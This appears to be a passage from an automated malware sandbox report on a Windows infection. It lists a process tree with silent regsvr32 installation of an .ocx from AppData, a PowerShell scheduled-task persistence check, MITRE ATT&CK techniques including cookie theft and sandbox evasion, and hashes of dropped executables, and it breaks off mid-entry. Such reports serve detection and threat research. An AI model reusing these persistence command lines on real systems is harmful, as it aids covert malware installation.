"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:19544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3724 -ip 3724
1⤵
PID:25872

C:\Windows\SysWOW64\fontdrvhost.exe
"C:\Windows\System32\fontdrvhost.exe"
1⤵
PID:9664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 26368 -ip 26368
1⤵
PID:13308

C:\Windows\system32\regsvr32.EXE
C:\Windows\system32\regsvr32.EXE /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\1wlanapi.ocx"
1⤵
PID:26120
- C:\Windows\SysWOW64\regsvr32.exe
  /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\1wlanapi.ocx"
  2⤵
  PID:8740
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1656

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:10364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 26436 -ip 26436
1⤵
PID:2756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:18452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:18444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 17052 -ip 17052
1⤵
PID:12524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 16992 -ip 16992
1⤵
PID:20200

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

T1556

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Authentication Process

T1556

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\00hdtj58q9.exe

Filesize
850KB

MD5
260faa08dbff4bc7ca6346061f42b956

SHA1
ccef508bb2693b097510015ef89ebb8f0289c5c1

SHA256
c47a55b842177445756163ca2d5cadaed5cdd4d313d7897b9aaac8e1d1c6e810

SHA512
ae30c903720f58abef12b9e091872d4a6470bae5ba246fc1d35dbaa4aecad04803647a0339490090a037de780b09df4282d5cc6247731729bf24e8fe872c42dc

Download Submit
C:\ProgramData\00z58g4wtr.exe

Filesize
736KB

MD5
18e5e760b807fc2b05172215540398b3

SHA1
6a1b4d3227088473c45869469b68a1737b26b90d

SHA256
6cff9733bcd32c2af2da61eab8281cd412a6d208ce6b763b783157be2901d5bd

SHA512
23430597753696466eea1c54337b1d37a734918433be2e0637aaf022c0ef09d5f8b04a3793ccb1a296bb83d13fda832d677cb926730653d78b0833f96737fa04

Download Submit
C:\ProgramData\2vkxt\i5fua1

Filesize
6KB

MD5
495dff99c17433eb990241ae330e6deb

SHA1
4f8a03760f2b149280009d028b3cbaeb6149853b

SHA256
d5172d86f421a27354f83c2d44ea1170b2cd408e11ac2cb1f36990d6807e02ab

SHA512
458ea3af7595198a95d8727bfcd79803feb4da9e998d54f26ad4844049b92f9cd74ba782c2dc67da121455efa6e76867b950eaad123c190f6f98306e8db52bf0

Download Submit
C:\ProgramData\DHJKJKKKJJJKJKFHJJJJ

Filesize
40KB

MD5
dfd4f60adc85fc874327517efed62ff7

SHA1
f97489afb75bfd5ee52892f37383fbc85aa14a69

SHA256
c007da2e5fd780008f28336940b427c3bfd509c72a40bfb7759592149ff3606e

SHA512
d76f75b1b5b23aa4f87c53ce44c3d3b7e41a44401e53d89f05a114600ea3dcd8beda9ca1977b489ac6ea5586cf26e47396e92d4796c370e89fab0aa76f38f3c4

Download Submit
C:\ProgramData\HJKJEHJKJEBGHJJKEBGI

Filesize
56KB

MD5
1c832d859b03f2e59817374006fe1189

SHA1
a4994a54e9f46a6c86ff92280c6dabe2bcd4cc42

SHA256
bb923abf471bb79086ff9ace293602e1ad882d9af7946dda17ff1c3a7e19f45b

SHA512
c4d3be414fa5dd30151cde9f6d808d56c26b031ff3f6446d21a15d071053787b6ba337b12909a56af7bb420f858dba5213f08e64ca9f836f52c98a18762b4bef

Download Submit
C:\ProgramData\ai58q\lxlxt0

Filesize
160KB

MD5
9b85a4b842b758be395bc19aba64799c

SHA1
c32922b745c9cf827e080b09f410b4378560acb3

SHA256
ecc8d7540d26e3c2c43589c761e94638fc5096af874d7df216e833b9599c673a

SHA512
fad80745bb64406d8f2947c1e69817cff57cc504d5a8cdca9e22da50402d27d005988f6759eaa91f1f7616d250772c9f5e4ec2f98ce7264501dd4f436d1665f0

Download Submit
C:\ProgramData\ai58q\n790h4

Filesize
130KB

MD5
058dc74c84588b01cb66b36e876cf4d3

SHA1
67ec628ec5ca36d357596bbaff725ad94dbc04cb

SHA256
d4ee3d44d39767e743ba74417f54330b0ef6b1f706fbcc67e8cfb89ebda0281d

SHA512
b2211a7749eac49c287bc36f8ad237f0d4bb0a97a9cd6f1da86227cba9f4226fb9b1637a3c5d2212f9601da43cb14808b7c4c51f71db088f7649bc653d7ec737

Download Submit
C:\ProgramData\l6xtrq1vs0.exe

Filesize
251KB

MD5
58d3a0d574e37dc90b40603f0658abd2

SHA1
bf5419ce7000113002b8112ace2a9ac35d0dc557

SHA256
dcc05c3ac7ae22d601bcb7c97cfcda568f3041bd39b2fd8899282dfde83369a5

SHA512
df61329a32e9261b01c5b7d95e0d9a3fb8cc36e5d90ede72bc16befe00fb32c221898a8346db9de07c0f5dcba57dcdbb09a22ca8b73223f989d33ec433c3a90a

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\q9h4w\4ek6xl

Filesize
288KB

MD5
93b940a7af99ef3b6de837675d8cdb35

SHA1
86fd28987e31ab4c7392d11aa5168f7489345540

SHA256
3a5e8f39a83e5849040ae2534bfc6be2085c51cf5a88d618bfed2d4808f9aa5b

SHA512
3dcdc5b5c0da68e0651cf9bea2d2dc62d4a7b867549ae348debc8fc9cbec1a99ebb78962d2b2008497181c37b88cbfce3b3041e2163f8e40f2f19266455d651e

Download Submit
C:\Temp\AdSm3roD2.hta

Filesize
779B

MD5
39c8cd50176057af3728802964f92d49

SHA1
68fc10a10997d7ad00142fc0de393fe3500c8017

SHA256
f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84

SHA512
cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

Download Submit
C:\Users\Admin:.repos

Filesize
1.2MB

MD5
f201001f36febf4ff472875ec1bd7f22

SHA1
873965f7799025419d8d253d017e4a2a4242ca93

SHA256
9f0c503d4f92fe20cc5afc6ada32aaa0a0bfdafddf21192d47a3aefb70cdf5db

SHA512
1419f1dab433205f59e98c95352e1f2cf90efec1be139cf294631a437c3fbf01024a8a1a02eb852dc8bcef67e014b87d53229003fbdb388ee0971e9ff0cb41d0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

Filesize
734B

MD5
e192462f281446b5d1500d474fbacc4b

SHA1
5ed0044ac937193b78f9878ad7bac5c9ff7534ff

SHA256
f1ba9f1b63c447682ebf9de956d0da2a027b1b779abef9522d347d3479139a60

SHA512
cc69a761a4e8e1d4bf6585aa8e3e5a7dfed610f540a6d43a288ebb35b16e669874ed5d2b06756ee4f30854f6465c84ee423502fc5b67ee9e7758a2dab41b31d3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

Filesize
192B

MD5
a37044ca4bb5a3f9e927d9555f7238bc

SHA1
d56e8add8f5df648cd5fd4b9d26ad0275cab5153

SHA256
26724d3430038a0ae1f0c15bf7e1956080ce0d105de93f7bb424ee8b6d241540

SHA512
5898b8aaa45b9c44320e70be69c82ef18505e37236638d15e8bcac8f298e42ac203c3dec5c7b09c2040a1c99bdf9daaf3b29f7e497460732085dba14273cec39

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D40B29EF2AAB638A6E53A219BE0F7862_7CC1BE4083661CE8C617B0F6CF027C04

Filesize
544B

MD5
1e234485ab6aa8f4639eb5ea084a3df1

SHA1
af3f25e2d105df57115d9ed261500e610bf9951d

SHA256
c3437fe86d6dc335d33faf8abe4e7db6691148dc916c6ee2609dfeb2d301e29b

SHA512
d92e3daa2538757420e28916282a604f87f4c08f5aeb22b07e4374c6a55c2deab5f6dcc2a9be8df7b0fd20a5b408f0aae0e4345af9818423320201c4a963e00a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
fbea9f3fbf579c979bc1bd5b5c2c41c5

SHA1
3ab2294a45de7633ee30cf90a8cba2b0b8be50bf

SHA256
a8a21249c0bb85754151fd3df615c3deff05c69f40e4db70a5254473bebc45b7

SHA512
6de1b7b5d8774147e5089adbb7a1fad9c60f58048d3d96a2af8a3790b2363921e60f89adaa889b02a77e6f82916bd33ec03d13ad68c5bd2eb0b9ee9fc37d6d91

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
a1a48535193af3a9859c630408a08ec4

SHA1
9e7646dac7ee6847861dc5025bdd6e62b62b9533

SHA256
a15012221076ecf98b95dbbef467f96e946c322c00476b4548cda1b60623ae13

SHA512
b68158ed07e6e0636fb863e2e7465e5ff58e109b3478363a1c3fa9e39009f389cf4ec4f143822e1a43c9d521c35ec24a79fbaca895bb2ffc5bc5cf7f0b7a4726

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
f7059e6b9f0312a1f7106cd4597d29e2

SHA1
a264228ea7f221801cdcb6b5b385e8ffdda98956

SHA256
a631f49fb0a280d56d1268fbf1c3598309975c680caf897c45a7a59695c755cf

SHA512
5e448c5f4df9c17b1265c639ab6dd8df5266d66e3fc045fc19d2a5ac327322e44d2c06f00ec7fee700dbb9b9979edad3e23efff205b7eef1ff0dfa90baf0707e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
930c3a6f47ea3584b29947c2a3182f3b

SHA1
d32daeee16cbc69f74e33936cd1bedf0f4dddf1b

SHA256
18f7a91e4bf44078ef7d9f925f12d450f6e8f3b12874aec8660c3db396ef34f8

SHA512
8703f5458f91bbc0c825f19311da39b203afed31660be3b464dd4b6ef95f64a8ca344a3d1fb30bc9a8ea95eee8a790b4c06a78e989ae2ebeb4aa2a15b45f9893

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
80KB

MD5
2b9a80aa9dfe47d359db41e6eba11a15

SHA1
d16b54141e85b8b4a005a8415f5cb603e89cf059

SHA256
c77685017f8c66f7bfdd91d0231a674d37f15c238b77549d98bed55692e7b16e

SHA512
6bc58f879e97cb8aff4378e388a310f5fd4153df2aafc06edd6de1d2200acfc9774e927f38a2be455901bae8c3f6b9e0df3c06229903b8f836c3bba7dbd88d4a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
81KB

MD5
be8d15819c9a7da9d95652d219c7a8e2

SHA1
96e3bd52c50eed45ebb937df09983460ca3a7fe8

SHA256
33dda70b1b4665452f2c2be6a8825f01fd1ee2833824252d5c724c2109bd2a94

SHA512
4c66504576767d9f2173b49e698ae96f6ad3dab18afc763d4284decfc657ee57ff835728f100ee5c10b4bf16808cd0c46dcac817dd921597a4528393af36adbb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
25604a2821749d30ca35877a7669dff9

SHA1
49c624275363c7b6768452db6868f8100aa967be

SHA256
7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

SHA512
206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
2009b833d92e03738ac1c445d621cab4

SHA1
fb51fa69c407e66e5588018da48284909ba63fd0

SHA256
b925d0d03aa1ee6fffa46ca032d8727a3a04ad294ad2966dea4291c70b573f8a

SHA512
216e825a975062cf003e0b42372832d609dab38a3de85f40a70ecc0bdc2df5a8010dbcc2ab58e14a4045a12be6d69ebd563e4d856ac42463478448a88a640a7b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
8752832920270c44197ae8a828db7839

SHA1
799847fc8137bb379bbefa07c682b226362e72ea

SHA256
cf166994aafde1ef43b81bdce87617a615ebd9942990de483929f6de2bf30173

SHA512
2b212e0a9195a3f824914409832260c00eff1455d5688e556db82648ab7de5ad7ace603a438d1ab4fbc5533602eafc5f6ad2161a56c78838c6388b675b148b4e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
2d0a70e78178001c85fe5215ae98ec95

SHA1
b458477e918ba2ab64d3c90f59fc0ff6713b9a69

SHA256
dea6c41a9d607b29bf5b9c0bbebe377a2e920f9527d7bcaf805b1c6f914e486d

SHA512
eaf2495ddecfad1aeb993b9be9c56cdae562ef231b930b84e16094764824bbc00e7ab8cf9b7f07887f02f1bd7aab249b7f331447ffc675049f6b597585c9388d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
65044109d1beb8ed8d59560642cbc519

SHA1
0084485b0aa26069232fab51ee603682e8edfd17

SHA256
a1e0b448218678b30356cbbe4092ea091435e7450822a9748361b6e8b198962d

SHA512
96dcc68fe92f98c4329a8335cfffdb0849a52562431045ccc42076bda0abf3842491303fb669246bfd04e64113688d3f90000a09571dd76ff84b52e34e45f9b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000ce

Filesize
162KB

MD5
1128a3cf12c9470e9e4f3131bde1c37e

SHA1
abdad13b0a6da58d2ed630fcc831338efdfffef4

SHA256
9fc98f5a339b2b6c2ac6a6fa4df8de18860f5f759522c25e393e7af3194a0a33

SHA512
d980ff3f67e5b8a576cf90b5bc2d2a711442ba7c6d5f6173a011ff583648e1b47c98a8f099cf655e98dca91aa2fa901bb073831d4dab144d5a7b15dc44d39a79

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_ntp.msn.com_0.indexeddb.leveldb\000003.log

Filesize
49KB

MD5
44a6b00c7f72f5149d1da8b8bf5447e6

SHA1
ed380f39d69283b33e789fe2e07bde3e1b78cdae

SHA256
b52661260f3f844832111f0a2f237cec59d9ff8616e4ac122b89fb0a4d7e1c0f

SHA512
5e3585cb7c1313bdd3d15cfe1dc80e88e247e727a77be8bad4cc9b14bac69e0efb3fd441d8ca5f45d4f66de986a453946c71824c410ad1decb20c2406d0f79ea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_ntp.msn.com_0.indexeddb.leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

Filesize
40B

MD5
20d4b8fa017a12a108c87f540836e250

SHA1
1ac617fac131262b6d3ce1f52f5907e31d5f6f00

SHA256
6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

SHA512
507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
16KB

MD5
5d9c86afe4b412c17bbce41a475ad614

SHA1
981a37dc22a23fcb5f1efe3779b7bcc0cdc856f3

SHA256
a49c01fbb24c06c459968944519643691892705e8c85a17a56696d0fa64e4943

SHA512
46000e9b99c8999767aa95de16a2b4d95ab812833d2e356f6c5859e1b56d91331afedaade795f933f4c93a7925f8f281d561b699a77baf6a2e999130a0f159f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
36KB

MD5
a1c10ffd5c52c33fd22b9a0c9ab5fc6b

SHA1
b4592847bdc5cda2a54e38033cd233cac1329dc5

SHA256
45a359c0bd3a16a7b4a557175b799c6c2ba87280f646e06979a4019428706e75

SHA512
4dd1853a8db0d2739024dd104e0c728dd8306d8808781f714328bfe7a063eb99eb5be839b4e38fcb4f361c0347179916c7820501574d2de9fbd8efe83baae560

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\b90a9dce-b22a-4b5b-8760-65ac93bf0dcf\index-dir\the-real-index

Filesize
72B

MD5
b75c165efdc5bafa2f5a2fcbe0771487

SHA1
7514906c57d9b13c219bcd923ddaec88e940c8d2

SHA256
6e3f7cc8099ff87066af6cf129e6ec29c55664a89ac7a061122dbe03aebf0b55

SHA512
2c869655fa3d706d3e3255d60ad197bdf2cfdee2cff053ac54ab8ae26ec0fccc8fbda2ec1abf23bc7b918482f8df955d6217ebcacced3b3fe9f46f8c814fa938

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\b90a9dce-b22a-4b5b-8760-65ac93bf0dcf\index-dir\the-real-index~RFe595b26.TMP

Filesize
72B

MD5
5318ed6820fb3a8c95937973d4c7a2bc

SHA1
bd47fc2b67d40743c3eb9ce5b4b4fe08044be665

SHA256
673783a432e8d53ccdb5f7165ed95c2faeb91abcdda8a2baeb82f532d00a6964

SHA512
835b943642d6e122505cfbbb2342c8006846462f9b2ffc4806b205f76e24c51fa8e39c9acd4df95a7c830f8a94ec02ef7b7c106830e19ccb64a304639e892e6e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt

Filesize
327B

MD5
6f228b3d210a6f4e9d9a0cfdd5e2f36c

SHA1
fb1b1e64d6d981461debc5f88db0c7e2b7713fe0

SHA256
7437b0ffae81150af51c99268803d4f683bc7777ecf13663f2f42f38cdb1a314

SHA512
2aecc0ee56279698e5c4374c02f7e0b6113e92753f2f4d01680918903cd796b6ca3c7f4cb6c1d3d4392c900ac85a57d306d52b53f3c9f4fbc95891e80b08691c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\f77e6cd5-f33a-4bc7-9204-43eb365ce944.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
35KB

MD5
5b79802ba37643fb70b4534dc4742e05

SHA1
1669e9ab10d6bdc96f1b2b49913f87c2a7c3e751

SHA256
d4e7c916ac9b01d47707c5e4874015ee521058b910e6d3076f8449324efe18f6

SHA512
313cfa4d80d6f9a1626938ff17e6ec2ea28d693519793d6de727f461a28acccf572f69cf111b10b6186c0926d35a6940bff2221caa44a363d547864b31493bc2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
40KB

MD5
d94189d949180f74dff1fefce7b7891d

SHA1
9ae3335327691e1e92e82cee1b4334a733dafd4d

SHA256
6231e7bf17d2a09a5646dbb80076c2b0fba10a12fd55dca9e4f7d48ecc253995

SHA512
5b89fbbcb8f201c9749c84ddd39a64e848caaa46225b9f8e0ab311911743f5c316ba50887f6b576a36fc74efc73fa947e6b5f610529086c03be400786611eef9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZDUDUCB4\success[2].htm

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
3f8dc68b99ae44ca25fed304925a4153

SHA1
8ae85a3a5e72e0f073145561a63b808d505ecc33

SHA256
472c9466149654ac4bdfecf09305ce651d0cd73650037e191a001cec9b0760b2

SHA512
9b2aadd495042892ec858e53493e3a2bd4380f198597456c0be4af8df3bf055a34befdffb22d8acbefda333b14267feff871772f8e03900d59312bbe32c7b5de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
9ae8ad1f7e2a095da0d48159b90d6cde

SHA1
792b0e3c880c6ff2ef6d5a470d5ea929b30842da

SHA256
27b700ef9f02964db81abb235c3e1285f90f8f1e13c83438fa2cb9bd09b9bb91

SHA512
2a36f81809fc1f8dcf7323e4ef0def041bf5b57718cc9334ad127fc776799f6315304c2263100e841f105c723f0f473b7ea274102f32d3fd818bef5ccd002aee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
b1b2f0c901b3e68c8c910ae7f9f9e311

SHA1
9c73149804bec1b0f39d3bc8493baf7e4dc183e1

SHA256
e2431b2f7640a3a2819ad90b7932a6537811a7c0a929c3fe96cab71893294e52

SHA512
c6f69c60dd8977f43045deb1a2ac0b0928dd6b5a85f91964a929c201d347db971b6988c39536c80d63f65e167bca17f9269825183df16d4bf38d29dc1a1b8271

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
727e620e6fdfe3e64e89cf3f23c5ef83

SHA1
45923498a354062cfe935b1fc8642c8ed33a038e

SHA256
815788d8af9658120bbae5ec3d0f1efaeed6c20fd9a03dc8bdbbb9d125c5ac8b

SHA512
20f1145445a34171269ccb69fe20dd18e8c8b9e177fa60e38e6ee4ed4ab6c765d9908948438826838df36a2901801777c22b6ea87cdd172f69dd6ee5257a26af

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\9z25oblb.default-release\cache2\entries\A585344A45AF937E3AB7D706291A9A3ED8D581D9

Filesize
13KB

MD5
960cfac164b4060ddd0bfa3e0a4eecad

SHA1
2970070c019624edfa534f7b2f2d1a4511a0f09b

SHA256
3b78efe62d50cbeec1a5cb9408e4834f8100c54ccecec921ba1a8c07d6a492a9

SHA512
733ae2473c4c41876d57ef1142fb727edf84a8e5d5d46142a1b33dfec2732df08cc086b43b1407a336978e7b930d9593e5df9c08afc71e68a4a9a453db8d0627

Download Submit
C:\Users\Admin\AppData\Local\TempM5K8BFTOFI4QVJKOLVPKZM3K9TTLFRJV.EXE

Filesize
1.8MB

MD5
8b9c70f6c54237a5a7cad4b678701cc7

SHA1
651a499d3689c3a3eab98bbc71f61bdffd3d1916

SHA256
cca43069b3a39dc378a3b931a4ef2a9af6d181fad1cf3e40319d02fb3ca0b70c

SHA512
005bdf2dd1cc5655a7e9b76050e712d36c3d708648df2487b39491dc43b069862c68c0fc470badfcba87e483daf7a873c58d1751ffa30765bd2c61e8604952e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe

Filesize
1.2MB

MD5
646254853368d4931ced040b46e9d447

SHA1
c9e4333c6feb4f0aeedf072f3a293204b9e81e28

SHA256
5a6764d23bb3d50f08f15b95e214a6dca0afb78e7416a21b72982c3649a49e9e

SHA512
485f252cd358ea41be648e013dc3ddeee1e57f8dea3ef42a5c8236a9769e7ebcf8bae1d5a36f55b6fb2cdcbbcf1878eca7d7885b63445cb081688a9512512819

Download Submit
C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe

Filesize
634KB

MD5
d62b289592043f863f302d7e8582e9bc

SHA1
cc72a132de961bb1f4398b933d88585ef8c29a41

SHA256
3c5a551b8fee65ffc444a3c0730b990591c3a95e442426563539f0a2ca3871d2

SHA512
63d389102c1b78ea5157aad0a3f45f351a5752ae896729d85be81b70721f19869efdb8dfa87906f891be9bec0d9154b7498e4ac4216fd3ec574fae64707e258c

Download Submit
C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe

Filesize
1.1MB

MD5
3928c62b67fc0d7c1fb6bcce3b6a8d46

SHA1
e843b7b7524a46a273267a86e320c98bc09e6d44

SHA256
630e00afe98ad4c1db391b74a84b7822a3abb3867a34f2ba163a8bf26d8d4397

SHA512
1884b125c89e32b6e5924e87ad9af827ae7e950ac80411e00a58c465eed88060af72142f9c512e0323e1ade46061f56a5247351e1c1d5e268f2ba35b5e447857

Download Submit
C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe

Filesize
2.0MB

MD5
28b543db648763fac865cab931bb3f91

SHA1
b6688b85d6c6d1bd45a3db2d108b6acf7467b0b4

SHA256
701b7ef0b368ddbe9e3d2ddaaaf10284287f38799e536336dc4c821930f13906

SHA512
7d514fc036efc8d57d400e7e84f5b565f40dc0f74a536c708b3fe5d6725e5d4541157e29f514e0706fad6d4159e0b863bedf757eca4df3e87927e462502a02d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe

Filesize
7.5MB

MD5
92c48437e156bcc9782d07e4d9c8caa3

SHA1
bad39e7dabbafbed9660b270f59efbf6f78195d3

SHA256
ea23400e5e48d6152943cc5dce265d606820e07ee2b89fc20ec0d9968bf0ef59

SHA512
41c1d4f79c98a269865b3f0d7d78a86ab15738d79c33394c441cd478a27b8da210f43781c317dcc64398f3124bb78295b43aef8bfb7ff83ef42cd82f0a282aa4

Download Submit
C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe

Filesize
712KB

MD5
e714f21784ba313bf9b0ceb2c138895a

SHA1
cabe70a2b37e02706d9118702e1692735a6c7b9a

SHA256
8730a3f5b2e25609cf42ee706bd062ab31c7499f51780f015815b2f9ad1dce44

SHA512
